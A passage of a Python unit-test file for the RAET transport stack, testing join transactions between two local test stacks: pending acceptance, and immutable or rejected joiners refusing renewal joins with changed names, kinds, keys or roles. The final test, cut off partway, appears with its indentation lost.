    beta.local.role = newRole
    # Keys: Either
    # Sameness: Not sameall
    keep = self.copyData(alphaRemote)
    # Ensure remote status is Pending
    roleData = alpha.keep.loadRemoteRoleData(oldRole)
    self.assertEqual(roleData['role'], oldRole)
    self.assertIs(roleData['acceptance'], raeting.Acceptance.pending.value)
    self.assertEqual(ns2b(roleData['verhex']), beta.local.signer.verhex)
    self.assertEqual(ns2b(roleData['pubhex']), beta.local.priver.pubhex)
    # Ensure alpha knows nothing about the new role
    roleData = alpha.keep.loadRemoteRoleData(newRole)
    self.assertEqual(roleData['role'], newRole)
    self.assertIs(roleData['acceptance'], None)
    self.assertIs(roleData['verhex'], None)
    self.assertIs(roleData['pubhex'], None)
    # Test
    self.join(beta, alpha, deid=betaRemote.nuid)
    # Action: Pend, Dump
    # One open transaction per side: the join is pended, not yet complete
    for stack in [alpha, beta]:
        self.assertEqual(len(stack.transactions), 1)
        self.assertEqual(len(stack.remotes), 1)
        self.assertEqual(len(stack.nameRemotes), 1)
        for remote in stack.remotes.values():
            self.assertIs(remote.joined, None)
            self.assertIs(remote.allowed, None)
            self.assertIs(remote.alived, None)
    self.assertTrue(alpha.mutable)
    self.assertIs(beta.mutable, None)
    # Assert alphaRemote is modified
    self.assertFalse(self.sameAll(alphaRemote, keep))
    self.assertFalse(self.sameRoleKeys(alphaRemote, keep))
    self.assertEqual(alphaRemote.role, newRole)
    self.assertIs(alphaRemote.acceptance, raeting.Acceptance.pending.value)
    self.assertIs(betaRemote.acceptance, None)
    # Check remote dump
    remoteData = alpha.keep.loadRemoteData(beta.local.name)
    self.assertIsNot(remoteData, None)
    self.assertEqual(remoteData['role'], beta.local.role)
    self.assertEqual(remoteData['acceptance'], raeting.Acceptance.pending.value)
    self.assertEqual(ns2b(remoteData['verhex']), beta.local.signer.verhex)
    self.assertEqual(ns2b(remoteData['pubhex']), beta.local.priver.pubhex)
    # Check role/keys dump
    roleData = alpha.keep.loadRemoteRoleData(beta.local.role)
    self.assertEqual(roleData['acceptance'], raeting.Acceptance.pending.value)
    self.assertEqual(roleData['role'], beta.local.role)
    self.assertEqual(ns2b(roleData['verhex']), beta.local.signer.verhex)
    self.assertEqual(ns2b(roleData['pubhex']), beta.local.priver.pubhex)
    # Allow beta to modify it's remote estate: set proper name and role for alpha remote estate on accept
    beta.mutable = True
    # Accept the transaction
    alpha.keep.acceptRemote(alphaRemote)
    self.serviceStacks([alpha, beta], duration=3.0)
    for stack in [alpha, beta]:
        self.assertEqual(len(stack.transactions), 0)
        self.assertEqual(len(stack.remotes), 1)
        self.assertEqual(len(stack.nameRemotes), 1)
        self.assertTrue(stack.mutable)
        for remote in stack.remotes.values():
            self.assertTrue(remote.joined)
            self.assertIs(remote.allowed, None)
            self.assertIs(remote.alived, None)
            self.assertEqual(remote.acceptance, raeting.Acceptance.accepted.value)
    self.assertIn('join_correspond_complete', alpha.stats)
    self.assertEqual(alpha.stats['join_correspond_complete'], 1)
    self.assertIn('join_initiate_complete', beta.stats)
    self.assertEqual(beta.stats['join_initiate_complete'], 1)
    # Check remote dump
    remoteData = alpha.keep.loadRemoteData(beta.local.name)
    # keep serializes ha as a list; sameAll compares against the tuple form
    remoteData['ha'] = tuple(remoteData['ha'])
    self.assertTrue(self.sameAll(alphaRemote, remoteData))
    # Check role/keys dump
    roleData = alpha.keep.loadRemoteRoleData(beta.local.role)
    self.assertEqual(roleData['acceptance'], raeting.Acceptance.accepted.value)
    self.assertEqual(roleData['role'], beta.local.role)
    self.assertEqual(ns2b(roleData['verhex']), beta.local.signer.verhex)
    self.assertEqual(ns2b(roleData['pubhex']), beta.local.priver.pubhex)
    for stack in [alpha, beta]:
        stack.server.close()
        stack.clearAllKeeps()
    def testJoinentNonVacuousPendingPendSameAll(self):
        '''
        Test joinent pend non-vacuous same all join (N1)

        Joinent (alpha) is in never auto-accept mode with the joiner's keys
        pre-pended, so the join transaction stalls pending manual acceptance;
        after acceptRemote the join completes with no remote data changed.
        '''
        console.terse("{0}\n".format(self.testJoinentNonVacuousPendingPendSameAll.__doc__))
        # Status: Pending
        # Mode: Never
        alpha, beta = self.bootstrapStacks()
        alpha.keep.auto = raeting.AutoMode.never.value
        # Mutable: Either
        alpha.mutable = True
        # Vacuous: No
        betaRemote = estating.RemoteEstate(stack=beta,
                                           fuid=0,
                                           sid=0, # always 0 for join
                                           ha=alpha.local.ha)
        # Ephemeral: No Nuid (the Nuid is known)
        alphaRemote = estating.RemoteEstate(stack=alpha,
                                            fuid=betaRemote.nuid,
                                            ha=beta.local.ha,
                                            name=beta.name,
                                            verkey=beta.local.signer.verhex,
                                            pubkey=beta.local.priver.pubhex)
        # cross-link the uids so the join is non-vacuous on both sides
        betaRemote.fuid = alphaRemote.nuid
        alpha.addRemote(alphaRemote)
        beta.addRemote(betaRemote)
        # pend beta's keys on alpha so the transaction must wait for acceptance
        alpha.keep.pendRemote(alphaRemote)
        # Ensure remote status is Pending
        roleData = alpha.keep.loadRemoteRoleData(beta.local.role)
        self.assertEqual(roleData['role'], beta.local.role)
        self.assertIs(roleData['acceptance'], raeting.Acceptance.pending.value)
        self.assertEqual(ns2b(roleData['verhex']), beta.local.signer.verhex)
        self.assertEqual(ns2b(roleData['pubhex']), beta.local.priver.pubhex)
        # Name: Old
        # Main: Old
        # Kind: Old
        # RHA: Old
        # Nuid: Old
        # Fuid: Old
        # Leid: Old
        # Reid: Old
        # Role: Old
        # Keys: Old
        # Sameness: SameAll
        keep = self.copyData(alphaRemote)
        # Test
        self.join(beta, alpha, deid=betaRemote.nuid)
        # Action: Pend, No change
        # Transaction is still open (pending) on both sides
        for stack in [alpha, beta]:
            self.assertEqual(len(stack.transactions), 1)
            self.assertEqual(len(stack.remotes), 1)
            self.assertEqual(len(stack.nameRemotes), 1)
            for remote in stack.remotes.values():
                self.assertIs(remote.joined, None)
                self.assertIs(remote.allowed, None)
                self.assertIs(remote.alived, None)
        self.assertTrue(alpha.mutable)
        self.assertIs(beta.mutable, None)
        # Assert alphaRemote is NOT modified (sameAll with the saved copy)
        self.assertTrue(self.sameAll(alphaRemote, keep))
        self.assertIs(alphaRemote.acceptance, raeting.Acceptance.pending.value)
        self.assertIs(betaRemote.acceptance, None)
        # Check remote dump
        remoteData = alpha.keep.loadRemoteData(beta.local.name)
        self.assertIsNot(remoteData, None)
        self.assertEqual(remoteData['role'], beta.local.role)
        self.assertEqual(remoteData['acceptance'], raeting.Acceptance.pending.value)
        self.assertEqual(ns2b(remoteData['verhex']), beta.local.signer.verhex)
        self.assertEqual(ns2b(remoteData['pubhex']), beta.local.priver.pubhex)
        # Check role/keys dump
        roleData = alpha.keep.loadRemoteRoleData(beta.local.role)
        self.assertEqual(roleData['acceptance'], raeting.Acceptance.pending.value)
        self.assertEqual(roleData['role'], beta.local.role)
        self.assertEqual(ns2b(roleData['verhex']), beta.local.signer.verhex)
        self.assertEqual(ns2b(roleData['pubhex']), beta.local.priver.pubhex)
        # Allow beta to modify it's remote estate: set proper name and role for alpha remote estate on accept
        beta.mutable = True
        # Accept the transaction
        alpha.keep.acceptRemote(alphaRemote)
        self.serviceStacks([alpha, beta], duration=3.0)
        # After acceptance the pended transaction completes on both sides
        for stack in [alpha, beta]:
            self.assertEqual(len(stack.transactions), 0)
            self.assertEqual(len(stack.remotes), 1)
            self.assertEqual(len(stack.nameRemotes), 1)
            self.assertTrue(stack.mutable)
            for remote in stack.remotes.values():
                self.assertTrue(remote.joined)
                self.assertIs(remote.allowed, None)
                self.assertIs(remote.alived, None)
                self.assertEqual(remote.acceptance, raeting.Acceptance.accepted.value)
        self.assertIn('join_correspond_complete', alpha.stats)
        self.assertEqual(alpha.stats['join_correspond_complete'], 1)
        self.assertIn('join_initiate_complete', beta.stats)
        self.assertEqual(beta.stats['join_initiate_complete'], 1)
        # Check remote dump
        remoteData = alpha.keep.loadRemoteData(beta.local.name)
        remoteData['ha'] = tuple(remoteData['ha'])
        self.assertTrue(self.sameAll(alphaRemote, remoteData))
        # Check role/keys dump
        roleData = alpha.keep.loadRemoteRoleData(beta.local.role)
        self.assertEqual(roleData['acceptance'], raeting.Acceptance.accepted.value)
        self.assertEqual(roleData['role'], beta.local.role)
        self.assertEqual(ns2b(roleData['verhex']), beta.local.signer.verhex)
        self.assertEqual(ns2b(roleData['pubhex']), beta.local.priver.pubhex)
        for stack in [alpha, beta]:
            stack.server.close()
            stack.clearAllKeeps()
    def testJoinerVacuousImmutableRejectNewName(self):
        '''
        Test immutable joiner reject vacuous renewal join with updated name (A1)

        Joiner (beta) is immutable (mutable is None) so when the renewal join
        brings back a changed joinent name the join must be rejected and
        beta's saved remote left untouched.
        '''
        console.terse("{0}\n".format(self.testJoinerVacuousImmutableRejectNewName.__doc__))
        # Mode: Never, Once, Always (use always as most loyal)
        alpha, beta = self.bootstrapStacks(autoMode=raeting.AutoMode.always.value)
        # Vacuous: Yes
        betaRemote = estating.RemoteEstate(stack=beta,
                                           fuid=0,
                                           sid=0, # always 0 for join
                                           ha=alpha.local.ha,
                                           name=alpha.name,
                                           verkey=alpha.local.signer.verhex,
                                           pubkey=alpha.local.priver.pubhex)
        # NOTE(review): alphaRemote is built with stack=beta (the joinent
        # tests above use stack=alpha) — presumably intentional so the nuid
        # is allocated from beta's uid space; confirm.
        alphaRemote = estating.RemoteEstate(stack=beta,
                                            fuid=betaRemote.nuid,
                                            ha=beta.local.ha,
                                            name=beta.name,
                                            verkey=beta.local.signer.verhex,
                                            pubkey=beta.local.priver.pubhex)
        alpha.addRemote(alphaRemote)
        beta.addRemote(betaRemote)
        # Ensure remote status is None
        roleData = beta.keep.loadRemoteRoleData(alpha.local.role)
        self.assertEqual(roleData['role'], alpha.local.role)
        self.assertIs(roleData['acceptance'], None)
        self.assertIs(roleData['verhex'], None)
        self.assertIs(roleData['pubhex'], None)
        # Name: New
        oldName = alpha.name
        newName = '{0}_new'.format(oldName)
        alpha.name = newName
        # Main: Either
        # Kind: Either
        # RHA: Old
        # Nuid: Old
        # Fuid: Body
        # Leid: Old
        # Reid: 0
        # Role: Either
        # Keys: Either
        # Sameness: Not sameall
        keep = self.copyData(betaRemote, fuid=alphaRemote.nuid)
        # Mutable: No
        self.assertIs(beta.mutable, None)
        # Test
        # Renew: Yes
        self.join(beta, alpha, deid=betaRemote.nuid, renewal=True)
        # Action: Reject
        for stack in [alpha, beta]:
            self.assertEqual(len(stack.transactions), 0)
            self.assertIs(stack.mutable, None)
            for remote in stack.remotes.values():
                self.assertIs(remote.joined, None)
                self.assertIs(remote.allowed, None)
                self.assertIs(remote.alived, None)
                self.assertIs(remote.acceptance, None)
        # alpha dropped its ephemeral remote; beta's saved remote is unchanged
        self.assertEqual(len(alpha.remotes), 0)
        self.assertEqual(len(alpha.nameRemotes), 0)
        self.assertEqual(len(beta.remotes), 1)
        self.assertEqual(len(beta.nameRemotes), 1)
        self.assertTrue(self.sameAll(betaRemote, keep))
        self.assertIn('joinent_transaction_failure', alpha.stats)
        self.assertEqual(alpha.stats['joinent_transaction_failure'], 1)
        self.assertIn('joiner_transaction_failure', beta.stats)
        self.assertEqual(beta.stats['joiner_transaction_failure'], 1)
        # Check remote dump
        remoteData = beta.keep.loadRemoteData(alpha.local.name)
        self.assertIs(remoteData, None)
        # Check role/keys dump
        roleData = beta.keep.loadRemoteRoleData(alpha.local.role)
        self.assertEqual(roleData['role'], alpha.local.role)
        self.assertEqual(roleData['acceptance'], None)
        self.assertEqual(roleData['verhex'], None)
        self.assertEqual(roleData['pubhex'], None)
        for stack in [alpha, beta]:
            stack.server.close()
            stack.clearAllKeeps()
    def testJoinerVacuousImmutableRejectNewMain(self):
        '''
        Test immutable joiner reject vacuous renewal join with updated main (A2)

        Joiner (beta) is immutable; a renewal join that reports a changed
        main flag for the joinent must be rejected without modifying beta's
        saved remote.
        '''
        console.terse("{0}\n".format(self.testJoinerVacuousImmutableRejectNewMain.__doc__))
        # Mode: Never, Once, Always (use always as most loyal)
        alpha, beta = self.bootstrapStacks(autoMode=raeting.AutoMode.always.value)
        # Vacuous: Yes
        betaRemote = estating.RemoteEstate(stack=beta,
                                           fuid=0,
                                           sid=0, # always 0 for join
                                           ha=alpha.local.ha,
                                           name=alpha.name,
                                           verkey=alpha.local.signer.verhex,
                                           pubkey=alpha.local.priver.pubhex)
        # NOTE(review): constructed with stack=beta (joinent tests use
        # stack=alpha) — presumably intentional for nuid allocation; confirm.
        alphaRemote = estating.RemoteEstate(stack=beta,
                                            fuid=betaRemote.nuid,
                                            ha=beta.local.ha,
                                            name=beta.name,
                                            verkey=beta.local.signer.verhex,
                                            pubkey=beta.local.priver.pubhex)
        alpha.addRemote(alphaRemote)
        beta.addRemote(betaRemote)
        # Ensure remote status is None
        roleData = beta.keep.loadRemoteRoleData(alpha.local.role)
        self.assertEqual(roleData['role'], alpha.local.role)
        self.assertIs(roleData['acceptance'], None)
        self.assertIs(roleData['verhex'], None)
        self.assertIs(roleData['pubhex'], None)
        # Name: Either
        # Main: New
        # beta's record says alpha is not main while alpha actually is,
        # so the join body will carry a changed main value
        betaRemote.main = False
        self.assertTrue(alpha.main)
        # Kind: Either
        # RHA: Old
        # Nuid: Old
        # Fuid: Body
        # Leid: Old
        # Reid: 0
        # Role: Either
        # Keys: Either
        # Sameness: Not sameall
        keep = self.copyData(betaRemote, fuid=alphaRemote.nuid)
        # Mutable: No
        self.assertIs(beta.mutable, None)
        # Test
        # Renew: Yes
        self.join(beta, alpha, deid=betaRemote.nuid, renewal=True)
        # Action: Reject
        for stack in [alpha, beta]:
            self.assertEqual(len(stack.transactions), 0)
            self.assertIs(stack.mutable, None)
            for remote in stack.remotes.values():
                self.assertIs(remote.joined, None)
                self.assertIs(remote.allowed, None)
                self.assertIs(remote.alived, None)
                self.assertIs(remote.acceptance, None)
        self.assertEqual(len(alpha.remotes), 0)
        self.assertEqual(len(alpha.nameRemotes), 0)
        self.assertEqual(len(beta.remotes), 1)
        self.assertEqual(len(beta.nameRemotes), 1)
        self.assertTrue(self.sameAll(betaRemote, keep))
        self.assertIn('joinent_transaction_failure', alpha.stats)
        self.assertEqual(alpha.stats['joinent_transaction_failure'], 1)
        self.assertIn('joiner_transaction_failure', beta.stats)
        self.assertEqual(beta.stats['joiner_transaction_failure'], 1)
        # Check remote dump
        remoteData = beta.keep.loadRemoteData(alpha.local.name)
        self.assertIs(remoteData, None)
        # Check role/keys dump
        roleData = beta.keep.loadRemoteRoleData(alpha.local.role)
        self.assertEqual(roleData['role'], alpha.local.role)
        self.assertEqual(roleData['acceptance'], None)
        self.assertEqual(roleData['verhex'], None)
        self.assertEqual(roleData['pubhex'], None)
        for stack in [alpha, beta]:
            stack.server.close()
            stack.clearAllKeeps()
    def testJoinerVacuousImmutableRejectNewKind(self):
        '''
        Test immutable joiner reject vacuous renewal join with updated kind (A3)

        Joiner (beta) is immutable; a renewal join that reports a changed
        kind for the joinent must be rejected without modifying beta's saved
        remote.
        '''
        console.terse("{0}\n".format(self.testJoinerVacuousImmutableRejectNewKind.__doc__))
        # Mode: Never, Once, Always (use always as most loyal)
        alpha, beta = self.bootstrapStacks(autoMode=raeting.AutoMode.always.value)
        # Vacuous: Yes
        betaRemote = estating.RemoteEstate(stack=beta,
                                           fuid=0,
                                           sid=0, # always 0 for join
                                           ha=alpha.local.ha,
                                           name=alpha.name,
                                           verkey=alpha.local.signer.verhex,
                                           pubkey=alpha.local.priver.pubhex)
        # NOTE(review): constructed with stack=beta (joinent tests use
        # stack=alpha) — presumably intentional for nuid allocation; confirm.
        alphaRemote = estating.RemoteEstate(stack=beta,
                                            fuid=betaRemote.nuid,
                                            ha=beta.local.ha,
                                            name=beta.name,
                                            verkey=beta.local.signer.verhex,
                                            pubkey=beta.local.priver.pubhex)
        alpha.addRemote(alphaRemote)
        beta.addRemote(betaRemote)
        # Ensure remote status is None
        roleData = beta.keep.loadRemoteRoleData(alpha.local.role)
        self.assertEqual(roleData['role'], alpha.local.role)
        self.assertIs(roleData['acceptance'], None)
        self.assertIs(roleData['verhex'], None)
        self.assertIs(roleData['pubhex'], None)
        # Name: Either
        # Main: Either
        # Kind: New
        oldKind = alpha.kind
        newKind = 33  # arbitrary kind value distinct from the bootstrap default
        self.assertNotEqual(oldKind, newKind)
        alpha.kind = newKind
        # RHA: Old
        # Nuid: Old
        # Fuid: Body
        # Leid: Old
        # Reid: 0
        # Role: Either
        # Keys: Either
        # Sameness: Not sameall
        keep = self.copyData(betaRemote, fuid=alphaRemote.nuid)
        # Mutable: No
        self.assertIs(beta.mutable, None)
        # Test
        # Renew: Yes
        self.join(beta, alpha, deid=betaRemote.nuid, renewal=True)
        # Action: Reject
        for stack in [alpha, beta]:
            self.assertEqual(len(stack.transactions), 0)
            self.assertIs(stack.mutable, None)
            for remote in stack.remotes.values():
                self.assertIs(remote.joined, None)
                self.assertIs(remote.allowed, None)
                self.assertIs(remote.alived, None)
                self.assertIs(remote.acceptance, None)
        self.assertEqual(len(alpha.remotes), 0)
        self.assertEqual(len(alpha.nameRemotes), 0)
        self.assertEqual(len(beta.remotes), 1)
        self.assertEqual(len(beta.nameRemotes), 1)
        self.assertTrue(self.sameAll(betaRemote, keep))
        self.assertIn('joinent_transaction_failure', alpha.stats)
        self.assertEqual(alpha.stats['joinent_transaction_failure'], 1)
        self.assertIn('joiner_transaction_failure', beta.stats)
        self.assertEqual(beta.stats['joiner_transaction_failure'], 1)
        # Check remote dump
        remoteData = beta.keep.loadRemoteData(alpha.local.name)
        self.assertIs(remoteData, None)
        # Check role/keys dump
        roleData = beta.keep.loadRemoteRoleData(alpha.local.role)
        self.assertEqual(roleData['role'], alpha.local.role)
        self.assertEqual(roleData['acceptance'], None)
        self.assertEqual(roleData['verhex'], None)
        self.assertEqual(roleData['pubhex'], None)
        for stack in [alpha, beta]:
            stack.server.close()
            stack.clearAllKeeps()
    def testJoinerVacuousImmutableRejectNewKeys(self):
        '''
        Test immutable joiner reject vacuous renewal join with updated keys (A4)

        Joiner (beta) is immutable; alpha regenerates its signing/encryption
        keys before the renewal join, so beta must reject the join and leave
        its saved remote untouched.
        '''
        console.terse("{0}\n".format(self.testJoinerVacuousImmutableRejectNewKeys.__doc__))
        # Mode: Never, Once, Always (use always as most loyal)
        alpha, beta = self.bootstrapStacks(autoMode=raeting.AutoMode.always.value)
        # Vacuous: Yes
        betaRemote = estating.RemoteEstate(stack=beta,
                                           fuid=0,
                                           sid=0, # always 0 for join
                                           ha=alpha.local.ha,
                                           name=alpha.name,
                                           verkey=alpha.local.signer.verhex,
                                           pubkey=alpha.local.priver.pubhex)
        # NOTE(review): constructed with stack=beta (joinent tests use
        # stack=alpha) — presumably intentional for nuid allocation; confirm.
        alphaRemote = estating.RemoteEstate(stack=beta,
                                            fuid=betaRemote.nuid,
                                            ha=beta.local.ha,
                                            name=beta.name,
                                            verkey=beta.local.signer.verhex,
                                            pubkey=beta.local.priver.pubhex)
        alpha.addRemote(alphaRemote)
        beta.addRemote(betaRemote)
        # Ensure remote status is None
        roleData = beta.keep.loadRemoteRoleData(alpha.local.role)
        self.assertEqual(roleData['role'], alpha.local.role)
        self.assertIs(roleData['acceptance'], None)
        self.assertIs(roleData['verhex'], None)
        self.assertIs(roleData['pubhex'], None)
        # Name: Either
        # Main: Either
        # Kind: Either
        # RHA: Old
        # Nuid: Old
        # Fuid: Body
        # Leid: Old
        # Reid: 0
        # Role: Old
        # Keys: New
        # regenerate alpha's key pairs and persist them so the join body
        # carries keys that differ from what beta recorded
        alpha.local.signer = nacling.Signer()
        alpha.local.priver = nacling.Privateer()
        alpha.dumpLocalRole()
        # Sameness: Not sameall, not same role/keys
        keep = self.copyData(betaRemote, fuid=alphaRemote.nuid)
        # Mutable: No
        self.assertIs(beta.mutable, None)
        # Test
        # Renew: Yes
        self.join(beta, alpha, deid=betaRemote.nuid, renewal=True)
        # Action: Reject
        for stack in [alpha, beta]:
            self.assertEqual(len(stack.transactions), 0)
            self.assertIs(stack.mutable, None)
            for remote in stack.remotes.values():
                self.assertIs(remote.joined, None)
                self.assertIs(remote.allowed, None)
                self.assertIs(remote.alived, None)
                self.assertIs(remote.acceptance, None)
        self.assertEqual(len(alpha.remotes), 0)
        self.assertEqual(len(alpha.nameRemotes), 0)
        self.assertEqual(len(beta.remotes), 1)
        self.assertEqual(len(beta.nameRemotes), 1)
        self.assertTrue(self.sameAll(betaRemote, keep))
        self.assertIn('joinent_transaction_failure', alpha.stats)
        self.assertEqual(alpha.stats['joinent_transaction_failure'], 1)
        self.assertIn('joiner_transaction_failure', beta.stats)
        self.assertEqual(beta.stats['joiner_transaction_failure'], 1)
        # Check remote dump
        remoteData = beta.keep.loadRemoteData(alpha.local.name)
        self.assertIs(remoteData, None)
        # Check role/keys dump
        roleData = beta.keep.loadRemoteRoleData(alpha.local.role)
        self.assertEqual(roleData['role'], alpha.local.role)
        self.assertEqual(roleData['acceptance'], None)
        self.assertEqual(roleData['verhex'], None)
        self.assertEqual(roleData['pubhex'], None)
        for stack in [alpha, beta]:
            stack.server.close()
            stack.clearAllKeeps()
    def testJoinerVacuousImmutableRejectNewRole(self):
        '''
        Test immutable joiner reject vacuous renewal join with updated role (A5)

        Joiner (beta) is immutable; alpha switches to a new role name before
        the renewal join, so beta must reject the join and leave its saved
        remote untouched.
        '''
        console.terse("{0}\n".format(self.testJoinerVacuousImmutableRejectNewRole.__doc__))
        # Mode: Never, Once, Always (use always as most loyal)
        alpha, beta = self.bootstrapStacks(autoMode=raeting.AutoMode.always.value)
        # Vacuous: Yes
        betaRemote = estating.RemoteEstate(stack=beta,
                                           fuid=0,
                                           sid=0, # always 0 for join
                                           ha=alpha.local.ha,
                                           name=alpha.name,
                                           verkey=alpha.local.signer.verhex,
                                           pubkey=alpha.local.priver.pubhex)
        # NOTE(review): constructed with stack=beta (joinent tests use
        # stack=alpha) — presumably intentional for nuid allocation; confirm.
        alphaRemote = estating.RemoteEstate(stack=beta,
                                            fuid=betaRemote.nuid,
                                            ha=beta.local.ha,
                                            name=beta.name,
                                            verkey=beta.local.signer.verhex,
                                            pubkey=beta.local.priver.pubhex)
        alpha.addRemote(alphaRemote)
        beta.addRemote(betaRemote)
        # Name: Either
        # Main: Either
        # Kind: Either
        # RHA: Old
        # Nuid: Old
        # Fuid: Body
        # Leid: Old
        # Reid: 0
        # Role: New
        oldRole = alpha.local.role
        newRole = '{0}_new'.format(oldRole)
        alpha.local.role = newRole
        alpha.dumpLocalRole()
        # Keys: Either
        # Sameness: Not sameall, not same role/keys
        keep = self.copyData(betaRemote, fuid=alphaRemote.nuid)
        # Mutable: No
        self.assertIs(beta.mutable, None)
        # Ensure remote status is None (beta has no data for either role yet)
        roleData = beta.keep.loadRemoteRoleData(oldRole)
        self.assertEqual(roleData['role'], oldRole)
        self.assertIs(roleData['acceptance'], None)
        self.assertIs(roleData['verhex'], None)
        self.assertIs(roleData['pubhex'], None)
        roleData = beta.keep.loadRemoteRoleData(newRole)
        self.assertEqual(roleData['role'], newRole)
        self.assertIs(roleData['acceptance'], None)
        self.assertIs(roleData['verhex'], None)
        self.assertIs(roleData['pubhex'], None)
        # Test
        # Renew: Yes
        self.join(beta, alpha, deid=betaRemote.nuid, renewal=True)
        # Action: Reject
        for stack in [alpha, beta]:
            self.assertEqual(len(stack.transactions), 0)
            self.assertIs(stack.mutable, None)
            for remote in stack.remotes.values():
                self.assertIs(remote.joined, None)
                self.assertIs(remote.allowed, None)
                self.assertIs(remote.alived, None)
                self.assertIs(remote.acceptance, None)
        self.assertEqual(len(alpha.remotes), 0)
        self.assertEqual(len(alpha.nameRemotes), 0)
        self.assertEqual(len(beta.remotes), 1)
        self.assertEqual(len(beta.nameRemotes), 1)
        self.assertTrue(self.sameAll(betaRemote, keep))
        self.assertIn('joinent_transaction_failure', alpha.stats)
        self.assertEqual(alpha.stats['joinent_transaction_failure'], 1)
        self.assertIn('joiner_transaction_failure', beta.stats)
        self.assertEqual(beta.stats['joiner_transaction_failure'], 1)
        # Check remote dump
        remoteData = beta.keep.loadRemoteData(alpha.local.name)
        self.assertIs(remoteData, None)
        # Check role/keys dump
        roleData = beta.keep.loadRemoteRoleData(alpha.local.role)
        self.assertEqual(roleData['role'], alpha.local.role)
        self.assertEqual(roleData['acceptance'], None)
        self.assertEqual(roleData['verhex'], None)
        self.assertEqual(roleData['pubhex'], None)
        for stack in [alpha, beta]:
            stack.server.close()
            stack.clearAllKeeps()
    def testJoinerVacuousRejectedRejectNewKeys(self):
        '''
        Test mutable joiner reject vacuous renewal join with updated keys (B1)

        Beta is mutable but alpha's role is already Rejected in beta's keep
        and alpha presents freshly generated keys, so the renewal join is
        rejected and beta's saved remote is left unchanged.
        '''
        console.terse("{0}\n".format(self.testJoinerVacuousRejectedRejectNewKeys.__doc__))
        # Mode: Never, Once
        alpha, beta = self.bootstrapStacks()
        beta.keep.auto = raeting.AutoMode.never.value
        # Vacuous: Yes
        betaRemote = estating.RemoteEstate(stack=beta,
                                           fuid=0,
                                           sid=0, # always 0 for join
                                           ha=alpha.local.ha,
                                           name=alpha.name,
                                           verkey=alpha.local.signer.verhex,
                                           pubkey=alpha.local.priver.pubhex)
        # NOTE(review): constructed with stack=beta (joinent tests use
        # stack=alpha) — presumably intentional for nuid allocation; confirm.
        alphaRemote = estating.RemoteEstate(stack=beta,
                                            fuid=betaRemote.nuid,
                                            ha=beta.local.ha,
                                            name=beta.name,
                                            verkey=beta.local.signer.verhex,
                                            pubkey=beta.local.priver.pubhex)
        alpha.addRemote(alphaRemote)
        beta.addRemote(betaRemote)
        # Status: Rejected
        beta.keep.rejectRemote(betaRemote)
        # Ensure remote status is Rejected
        roleData = beta.keep.loadRemoteRoleData(alpha.local.role)
        self.assertEqual(roleData['role'], alpha.local.role)
        self.assertIs(roleData['acceptance'], raeting.Acceptance.rejected.value)
        self.assertEqual(ns2b(roleData['verhex']), alpha.local.signer.verhex)
        self.assertEqual(ns2b(roleData['pubhex']), alpha.local.priver.pubhex)
        # Name: Either
        # Main: Either
        # Kind: Either
        # RHA: Old
        # Nuid: Old
        # Fuid: Body
        # Leid: Old
        # Reid: 0
        # Role: Old
        # Keys: New
        # regenerate alpha's key pairs in memory (not persisted here)
        alpha.local.signer = nacling.Signer()
        alpha.local.priver = nacling.Privateer()
        # Sameness: Not sameall
        keep = self.copyData(betaRemote, fuid=alphaRemote.nuid)
        # Mutable: Yes
        beta.mutable = True
        # Test
        # Renew: Yes
        self.join(beta, alpha, deid=betaRemote.nuid, renewal=True)
        # Action: Reject
        for stack in [alpha, beta]:
            self.assertEqual(len(stack.transactions), 0)
            for remote in stack.remotes.values():
                self.assertIs(remote.joined, None)
                self.assertIs(remote.allowed, None)
                self.assertIs(remote.alived, None)
                self.assertIs(remote.acceptance, raeting.Acceptance.rejected.value)
        self.assertIs(alpha.mutable, None)
        self.assertTrue(beta.mutable)
        self.assertEqual(len(alpha.remotes), 0)
        self.assertEqual(len(alpha.nameRemotes), 0)
        self.assertEqual(len(beta.remotes), 1)
        self.assertEqual(len(beta.nameRemotes), 1)
        self.assertTrue(self.sameAll(betaRemote, keep))
        self.assertIn('joinent_transaction_failure', alpha.stats)
        self.assertEqual(alpha.stats['joinent_transaction_failure'], 1)
        self.assertIn('joiner_transaction_failure', beta.stats)
        self.assertEqual(beta.stats['joiner_transaction_failure'], 1)
        # Check remote dump
        remoteData = beta.keep.loadRemoteData(alpha.local.name)
        self.assertIs(remoteData, None)
        # Check role/keys dump: still the OLD (rejected) keys beta recorded
        roleData = beta.keep.loadRemoteRoleData(alpha.local.role)
        self.assertEqual(roleData['role'], alpha.local.role)
        self.assertEqual(roleData['acceptance'], raeting.Acceptance.rejected.value)
        self.assertEqual(ns2b(roleData['verhex']), betaRemote.verfer.keyhex)
        self.assertEqual(ns2b(roleData['pubhex']), betaRemote.pubber.keyhex)
        for stack in [alpha, beta]:
            stack.server.close()
            stack.clearAllKeeps()
def testJoinerVacuousRejectedRejectNewRole(self):
'''
Test mutable joiner reject vacuous renewal join with updated role (B2)
'''
console.terse("{0}\n".format(self.testJoinerVacuousRejectedRejectNewRole.__doc__))
alpha, alphaData = self.bootstrapStack(name='alpha',
ha=("", raeting.RAET_PORT),
main=True,
auto=raeting.AutoMode.once.value,
role=None,
kind=None,
mutable=True, )
self.assertIs(alpha.local.role, 'alpha')
self.assertEqual(alpha.ha, ('0.0.0.0', raeting.RAET_PORT))
self.assertEqual(alpha.local.ha, ('127.0.0.1', raeting.RAET_PORT))
beta, betaData = self.bootstrapStack(name='beta',
ha=("", raeting.RAET_TEST_PORT),
main=None,
auto=raeting.AutoMode.once.value,
role=None,
kind=None,
mutable=True, )
self.assertIs(beta.local.role, 'beta')
self.assertEqual(beta.ha, ('0.0.0.0', raeting.RAET_TEST_PORT))
self.assertEqual(beta.local.ha, ('127.0.0.1', raeting.RAET_TEST_PORT))
# Do initial join vacuous join to setup rejoin with renew
# create remote to join to alpha
remote = beta.addRemote(estating.RemoteEstate(stack=beta,
fuid=0, # vacuous join
sid=0, # always 0 for join
ha=alpha.local.ha))
self.join(beta, alpha, deid=remote.uid)
for stack in [alpha, beta]:
self.assertEqual(len(stack.transactions), 0)
self.assertEqual(len(stack.remotes), 1)
for remote in stack.remotes.values():
self.assertIs(remote.joined, True)
self.assertIs(remote.acceptance, raeting.Acceptance.accepted.value)
self.assertIs(remote.allowed, None)
self.assertIs(remote.alived, None)
alphaRemoteBeta = alpha.remotes.values()[0]
betaRemoteAlpha = beta.remotes.values()[0]
self.assertIs(beta.local.role, 'beta')
# save the current state of beta stack remote for alpha
betaRemoteAlphaSave = self.copyData(betaRemoteAlpha)
# move alpha stack remote for beta to different uid (nuid) to force renew
oldUid = alphaRemoteBeta.uid
